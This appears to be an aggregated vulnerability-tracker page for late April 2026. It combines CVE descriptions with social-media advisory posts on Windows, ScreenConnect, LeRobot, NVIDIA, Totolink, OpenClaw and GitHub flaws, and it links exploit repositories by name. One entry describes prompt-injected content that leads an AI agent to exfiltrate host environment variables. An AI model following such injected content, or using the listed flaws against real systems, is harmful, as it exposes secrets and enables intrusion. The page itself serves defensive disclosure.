Vols d’identifiants sur Windows : Microsoft révèle l’exploitation de la CVE-2026-32202 it-connect.fr/vols-didentifian #ActuCybersécurité #Cybersécurité #Vulnérabilité #Microsoft #Windows

##

secdb@infosec.exchange at 2026-04-28T20:00:14.000Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (secdb.nttzen.cloud/cve/detail/)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: connectwise.com/company/trust/ ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-32202 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

##

Chris@mast.social at 2026-04-28T18:17:44.000Z ##

🛡️ Title: Windows Shell Spoofing Vulnerability
Description

🛡️ Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.

cve.org/CVERecord?id=CVE-2026-

#cybersecurity #security #windows #microsoft

##

cisakevtracker@mastodon.social at 2026-04-28T18:01:08.000Z ##

CVE ID: CVE-2026-32202
Vendor: Microsoft
Product: Windows
Date Added: 2026-04-28
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

hackerworkspace@infosec.exchange at 2026-04-28T07:31:12.000Z ##

Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202

thehackernews.com/2026/04/micr

Read on HackerWorkspace: hackerworkspace.com/article/mi

#cybersecurity #threatintelligence #vulnerability

##

CVE-2026-25874
(9.8 CRITICAL)

EPSS: 0.11%

updated 2026-04-28T21:37:03

6 posts

LeRobot contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload through the S

beyondmachines1 at 2026-04-29T13:01:43.600Z ##

Critical Unpatched RCE Vulnerability in Hugging Face LeRobot Robotics Platform

Hugging Face's LeRobot robotics platform contains a critical unpatched vulnerability (CVE-2026-25874) that allows unauthenticated remote code execution via unsafe pickle deserialization. Attackers can exploit exposed gRPC endpoints to take full control of robotics servers and connected hardware.

**If you're using Hugging Face LeRobot, make sure all robot devices and servers are isolated from the internet and accessible only from trusted networks. Until version 0.6.0 is released with a fix for CVE-2026-25874, run LeRobot as a non-root user inside restricted containers, and monitor for unusual processes or outbound traffic.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-04-29T13:01:43.000Z ##

Critical Unpatched RCE Vulnerability in Hugging Face LeRobot Robotics Platform

Hugging Face's LeRobot robotics platform contains a critical unpatched vulnerability (CVE-2026-25874) that allows unauthenticated remote code execution via unsafe pickle deserialization. Attackers can exploit exposed gRPC endpoints to take full control of robotics servers and connected hardware.

**If you're using Hugging Face LeRobot, make sure all robot devices and servers are isolated from the internet and accessible only from trusted networks. Until version 0.6.0 is released with a fix for CVE-2026-25874, run LeRobot as a non-root user inside restricted containers, and monitor for unusual processes or outbound traffic.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

hackerworkspace@infosec.exchange at 2026-04-29T04:16:35.000Z ##

Critical Unpatched Flaw Leaves Hugging Face LeRobot Open to Unauthenticated RCE

thehackernews.com/2026/04/crit

Read on HackerWorkspace: hackerworkspace.com/article/cr

#cybersecurity #aisecurity #vulnerability

##

netsecio@mastodon.social at 2026-04-28T16:41:17.000Z ##

📰 Critical Unpatched RCE Flaw in Hugging Face's LeRobot AI Platform Puts Robotics Systems at Risk

🚨 CRITICAL FLAW: Unpatched RCE (CVE-2026-25874, CVSS 9.3) in Hugging Face's LeRobot AI platform. Unsafe deserialization allows unauthenticated attackers to execute code. #CVE202625874 #HuggingFace #AI #RCE

🔗 cyber.netsecops.io

##

mttaggart@infosec.exchange at 2026-04-28T13:05:15.000Z ##

May I suggest...not exposing your robot control plane to the internet

resecurity.com/blog/article/cv

##

jbhall56@infosec.exchange at 2026-04-28T12:29:27.000Z ##

The vulnerability in question is CVE-2026-25874 (CVSS score: 9.3), which has been described as a case of untrusted data deserialization stemming from the use of the unsafe pickle format. thehackernews.com/2026/04/crit

##

CVE-2026-24222
(8.6 HIGH)

EPSS: 0.04%

updated 2026-04-28T21:36:23

2 posts

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environment variables not properly restricted during sandbox creation. A successful exploit of this vulnerability might lead to information disclosure.

thehackerwire@mastodon.social at 2026-04-28T22:33:42.000Z ##

🟠 CVE-2026-24222 - High (8.6)

NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environm...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24204
(6.5 MEDIUM)

EPSS: 0.04%

updated 2026-04-28T21:36:23

1 posts

NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Improper Input Validation by path traversing. A successful exploit of this vulnerability may lead to information disclosure.

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24186
(8.8 HIGH)

EPSS: 0.06%

updated 2026-04-28T21:36:22

2 posts

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.

thehackerwire@mastodon.social at 2026-04-28T22:33:32.000Z ##

🟠 CVE-2026-24186 - High (8.8)

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24231
(6.3 MEDIUM)

EPSS: 0.01%

updated 2026-04-28T21:36:22

1 posts

NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF protection component, where an attacker could cause a server-side request forgery by supplying a crafted endpoint URL referencing the 0.0.0.0/8 address range through a blueprint configuration file or CLI flag. A successful exploit of this vulnerability may lead to information disclosure.

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24178
(9.8 CRITICAL)

EPSS: 0.14%

updated 2026-04-28T21:36:21

2 posts

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to privilege escalation, data tampering, information disclosure, code execution, and denial of service.

thehackerwire@mastodon.social at 2026-04-28T22:33:22.000Z ##

🔴 CVE-2026-24178 - Critical (9.8)

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2024-1708
(8.5 HIGH)

EPSS: 81.62%

updated 2026-04-28T21:34:00

8 posts

ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulnerability, which may allow an attacker the ability to execute remote code or directly impact confidential data or critical systems.

3 repos

https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE

https://github.com/Teexo/ScreenConnect-CVE-2024-1709-Exploit

https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708

AAKL at 2026-04-29T16:54:57.114Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat support.broadcom.com/web/ecx/s
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports talosintelligence.com/vulnerab @TalosSecurity
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability cve.org/CVERecord?id=CVE-2024-

- Also, one industrial vulnerability cisa.gov/news-events/ics-advis

##

beyondmachines1 at 2026-04-29T16:01:43.479Z ##

CISA Reports Active Exploitation of ConnectWise Flaw

CISA reports active exploitation of ConnectWise ScreenConnect (CVE-2024-1708) that allow for remote code execution and security mechanism bypasses. CISA is requiring patching by May 12, 2026.

**If you're using ConnectWise ScreenConnect, update to the latest patched version ASAP. Your ScreenConnect is being actively exploited to deploy ransomware. If you can't patch right away, restrict access to the ScreenConnect server to trusted networks only and monitor for any signs of unauthorized access or suspicious activity.**

beyondmachines.net/event_detai

##

undercodenews@mastodon.social at 2026-04-29T13:26:32.000Z ##

CISA Sounds Alarm Over Actively Exploited ConnectWise ScreenConnect Flaw, Immediate Patching Urged

Introduction The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning after confirming active exploitation of a serious vulnerability affecting ConnectWise ScreenConnect, one of the most widely used remote access and IT support platforms in enterprise environments. The flaw, tracked as CVE-2024-1708, has now been officially added to…

undercodenews.com/cisa-sounds-

##

CapTechGroup@mastodon.social at 2026-04-29T12:54:25.000Z ##

CISA's KEV catalog now includes CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect auth bypass + RCE chain) plus CVE-2026-32202 (Windows Shell). APT28 has been weaponizing these since December 2025. The...

captechgroup.com/about-us/thre

##

AAKL@infosec.exchange at 2026-04-29T16:54:57.000Z ##

Broadcom has a new advisory for a critical vulnerability:

ESM Microservice 15.0 Vulnerability in Apache Tomcat support.broadcom.com/web/ecx/s #Broadcom #ApacheTomCat
---

Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports talosintelligence.com/vulnerab @TalosSecurity #zeroday
---

From yesterday:

CISA added two vulnerabilities to the KEV catalogue:

- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability cve.org/CVERecord?id=CVE-2024-

- Also, one industrial vulnerability cisa.gov/news-events/ics-advis #CISA #Microsoft #vulnerability #infosec

##

beyondmachines1@infosec.exchange at 2026-04-29T16:01:43.000Z ##

CISA Reports Active Exploitation of ConnectWise Flaw

CISA reports active exploitation of ConnectWise ScreenConnect (CVE-2024-1708) that allow for remote code execution and security mechanism bypasses. CISA is requiring patching by May 12, 2026.

**If you're using ConnectWise ScreenConnect, update to the latest patched version ASAP. Your ScreenConnect is being actively exploited to deploy ransomware. If you can't patch right away, restrict access to the ScreenConnect server to trusted networks only and monitor for any signs of unauthorized access or suspicious activity.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

secdb@infosec.exchange at 2026-04-28T20:00:14.000Z ##

🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2024-1708 (secdb.nttzen.cloud/cve/detail/)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: connectwise.com/company/trust/ ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-32202 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202

##

cisakevtracker@mastodon.social at 2026-04-28T18:00:52.000Z ##

CVE ID: CVE-2024-1708
Vendor: ConnectWise
Product: ScreenConnect
Date Added: 2026-04-28
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2026-7202
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T20:24:58.820000

2 posts

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWiFiWpsStart of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument wscDisabled leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

offseq@infosec.exchange at 2026-04-28T05:00:28.000Z ##

🛑 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) is vulnerable to OS command injection (CVE-2026-7202). Public exploit available. Restrict remote access & disable WPS until patched! radar.offseq.com/threat/cve-20 #OffSeq #IoTSecurity #vulnerability #CVE20267202

##

thehackerwire@mastodon.social at 2026-04-28T01:43:42.000Z ##

🔴 CVE-2026-7202 - Critical (9.8)

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWiFiWpsStart of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument wscDisabled leads to os command injec...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7240
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T20:24:20.377000

1 posts

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setVpnAccountCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument User leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.

offseq@infosec.exchange at 2026-04-28T08:00:31.000Z ##

🚨 CRITICAL OS command injection in Totolink A8000RU (7.1cu.643_b20200521) via setVpnAccountCfg lets remote attackers run arbitrary commands. No patch yet; restrict device access & monitor closely. CVE-2026-7240 radar.offseq.com/threat/cve-20 #OffSeq #CVE20267240 #infosec

##

CVE-2026-38651
(8.2 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:23:20.703000

1 posts

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key and use it to impersonate any host in the network, gaining access to sensitive information

thehackerwire@mastodon.social at 2026-04-28T22:34:34.000Z ##

🟠 CVE-2026-38651 - High (8.2)

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7279
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:22:38.260000

1 posts

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads the DLL.

thehackerwire@mastodon.social at 2026-04-29T01:00:07.000Z ##

🟠 CVE-2026-7279 - High (7.8)

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67223
(7.5 HIGH)

EPSS: 0.13%

updated 2026-04-28T20:18:13.020000

1 posts

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtual paths of uploaded files and bypass access controls to download sensitive documents containing PII.

1 repos

https://github.com/brandonperezlara/CVE-2025-67223

thehackerwire@mastodon.social at 2026-04-29T00:15:55.000Z ##

🟠 CVE-2025-67223 - High (7.5)

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtua...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-20766
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:11:56.713000

1 posts

An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras.

thehackerwire@mastodon.social at 2026-04-28T02:07:15.000Z ##

🟠 CVE-2026-20766 - High (8.8)

An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40972
(7.5 HIGH)

EPSS: 0.05%

updated 2026-04-28T20:11:56.713000

1 posts

An attacker on the same network as the remote application may be able to utilize a timing attack to discover information about the remote secret. In extreme circumstances this could result in the attacker determining the secret and uploading changed classes, thereby achieving remote code execution in the remote application. Affected: Spring Boot 4.0.0–4.0.5 (fix 4.0.6), 3.5.0–3.5.13 (fix 3.5.14),

thehackerwire@mastodon.social at 2026-04-28T01:00:06.000Z ##

🟠 CVE-2026-40972 - High (7.5)

An attacker on the same network as the remote application may be able to utilize a timing attack to discover information about the remote secret. In extreme circumstances this could result in the attacker determining the secret and uploading chang...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7320
(7.5 HIGH)

EPSS: 0.03%

updated 2026-04-28T20:10:59.913000

1 posts

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

thehackerwire@mastodon.social at 2026-04-28T23:38:12.000Z ##

🟠 CVE-2026-7320 - High (7.5)

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3893
(9.4 CRITICAL)

EPSS: 0.06%

updated 2026-04-28T20:10:23.367000

1 posts

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials.

thehackerwire@mastodon.social at 2026-04-28T22:31:41.000Z ##

🔴 CVE-2026-3893 - Critical (9.4)

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism,
allowing an attacker with network access to directly access and modify
its configuration and operational functions without needing credentials.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41384
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace configs to inject arbitrary environment variables into the backend process spawning, enabling code execution or sensitive data exposure.

thehackerwire@mastodon.social at 2026-04-28T22:30:33.000Z ##

🟠 CVE-2026-41384 - High (7.8)

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41395
(7.5 HIGH)

EPSS: 0.02%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay cache detection and trigger duplicate voice-call processing with a captured valid signed webhook.

thehackerwire@mastodon.social at 2026-04-28T22:00:12.000Z ##

🟠 CVE-2026-41395 - High (7.5)

OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41396
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by overriding the bundled plugin trust root directory.

thehackerwire@mastodon.social at 2026-04-28T21:49:48.000Z ##

🟠 CVE-2026-41396 - High (7.8)

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by ov...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42422
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not undergone intended approval.

thehackerwire@mastodon.social at 2026-04-28T21:13:45.000Z ##

🟠 CVE-2026-42422 - High (8.8)

OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not u...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42432
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute privileged commands on the local assistant system.

thehackerwire@mastodon.social at 2026-04-28T21:00:16.000Z ##

🟠 CVE-2026-42432 - High (7.8)

OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute pri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3854
(8.8 HIGH)

EPSS: 0.35%

updated 2026-04-28T19:37:39.507000

42 posts

An improper neutralization of special elements vulnerability was identified in GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance. During a git push operation, user-supplied push option values were not properly sanitized before being included in internal service headers. Because the internal header format used a delim

4 repos

https://github.com/5kr1pt/CVE-2026-3854

https://github.com/LACHHAB-Anas/Exploit_CVE-2026-3854

https://github.com/lysophavin18/CVE-2026-3854-PoC

https://github.com/simondankelmann/cve-2026-3854-test

mackuba@martianbase.net at 2026-04-29T20:47:26.000Z ##

Uh… this seems bad wiz.io/blog/github-rce-vulnera

##

mastokukei@social.josko.org at 2026-04-29T18:01:59.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei masto.kukei.eu/browse/programm category:
- **Zed 1.0 release**: Zed editor reaches 1.0 milestone, marketed as an AI-native editor with multi-agent support (Claude, Codex, OpenCode).
- **GitHub controversies**: GitHub outages, RCE vulnerability (CVE-2026-3854), and projects migrating away (e.g., Ghostty, BookStack to Codeberg).
- **AI coding tools and incidents**: Claude Code deletes [1/2]

##

mastokukei@social.josko.org at 2026-04-29T18:01:48.000Z ##

like GitHub Copilot and its shift to usage-based billing

2. **GitHub Issues and Alternatives**
- Frequent GitHub outages and reliability concerns
- Projects migrating from GitHub to alternatives like Codeberg and Radicle
- Security vulnerabilities (e.g., CVE-2026-3854) and criticism from developers

3. **Energy and Sustainability Innovations**
- Sodium-ion batteries becoming mainstream (CATL’s 60 GWh deal)
- Renewable energy advancements (solar, wind, and [2/4]

##

CuratedHackerNews@mastodon.social at 2026-04-29T16:21:04.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#github

##

beyondmachines1 at 2026-04-29T15:01:43.707Z ##

GitHub Patches Critical RCE Vulnerability in GitHub.com and GitHub Enterprise Server

GitHub patched a critical RCE vulnerability (CVE-2026-3854) in its internal git infrastructure that allowed authenticated users to compromise backend servers and access millions of repositories.

**If you run GitHub Enterprise Server (version 3.19.1 or earlier), upgrade immediately to a patched version (3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.8, 3.19.4, 3.20.0, or later) since nearly 90% of instances are still unpatched. Also check your audit logs at `/var/log/github-audit.log` for push operations with unusual special characters in option values to spot any exploitation attempts; if you use GitHub.com or GitHub Enterprise Cloud, no action is needed since GitHub already fixed it.**

beyondmachines.net/event_detai

##

nixCraft@mastodon.social at 2026-04-29T14:31:29.000Z ##

With Microsoft pushing AI slop & bots hard into every product without any verification and accountability I am not surprised bug like this now exists. Critical GitHub RCE bug exposed millions of repositories including private one that business users like to keep their code private. GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance nvd.nist.gov/vuln/detail/CVE-2

##

undercodenews@mastodon.social at 2026-04-29T13:00:44.000Z ##

GitHub Emergency Patch Stops Critical RCE Flaw That Could Have Exposed Millions of Private Repositories

Introduction GitHub has quietly prevented what may have become one of the most dangerous software supply chain incidents in recent years. In early March 2026, the company patched a critical remote code execution vulnerability tracked as CVE-2026-3854, a flaw that researchers say could have given attackers access to millions of private repositories worldwide. The…

undercodenews.com/github-emerg

##

F30@chaos.social at 2026-04-29T11:58:04.000Z ##

"A single git push command was enough to exploit a flaw in GitHub's internal protocol and achieve code execution on backend infrastructure.
[…]
This research was made possible by AI-augmented reverse engineering tooling, particularly IDA MCP, which allowed us to rapidly analyze compiled binaries and reconstruct internal protocols at a speed that would not have been feasible manually."
